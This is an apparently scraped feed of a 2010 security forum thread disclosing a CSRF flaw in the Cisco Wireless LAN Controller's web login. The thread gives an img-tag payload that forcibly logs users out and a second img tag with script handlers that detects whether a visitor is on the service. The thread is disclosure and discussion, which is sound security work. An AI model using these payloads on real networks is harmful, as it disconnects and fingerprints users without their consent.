Here's a simple csrf that will disconnect users using Cisco Wireless LAN Controller http://www.cisco.com/en/US/docs/wireless/controller/5.1/configuration/guide/c51users.html#wpmkr1056080. For the background: This system is a web login use mostly on unencrypted wireless access point. <img src="https://1.1.1.1/logout.html?userStatus=1&err_flag=0&err_msg="/> -No referrer validation -No Method validation (the form is suppose to be POST) -No token / captcha The original form : http://slexy.org/view/s20YhD795p http://sla.ckers.org/forum/read.php?3,34317,34317#msg-34317 Tue, 21 May 2013 04:31:50 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?3,34317,34329#msg-34329 http://sla.ckers.org/forum/read.php?3,34317,34329#msg-34329 Skyphire Full Disclosure Tue, 27 Apr 2010 17:53:16 -0500 http://sla.ckers.org/forum/read.php?3,34317,34325#msg-34325 http://sla.ckers.org/forum/read.php?3,34317,34325#msg-34325
Image and stylesheet ? If you mean being able to detect that a visitor is using this service, logout.html should do the trick without disconnecting users.

<img src="https://1.1.1.1/logout.html" onerror="alert('nothing special')" onload="alert('Hi Cisco user!')"/>]]> h3xstream Full Disclosure Tue, 27 Apr 2010 12:45:10 -0500 http://sla.ckers.org/forum/read.php?3,34317,34320#msg-34320 http://sla.ckers.org/forum/read.php?3,34317,34320#msg-34320 Skyphire Full Disclosure Tue, 27 Apr 2010 08:06:08 -0500 http://sla.ckers.org/forum/read.php?3,34317,34317#msg-34317 http://sla.ckers.org/forum/read.php?3,34317,34317#msg-34317 For the background: This system is a web login use mostly on unencrypted wireless access point.

<img src="https://1.1.1.1/logout.html?userStatus=1&err_flag=0&err_msg="/>

-No referrer validation
-No Method validation (the form is suppose to be POST)
-No token / captcha

The original form : http://slexy.org/view/s20YhD795p]]> h3xstream Full Disclosure Mon, 26 Apr 2010 17:28:32 -0500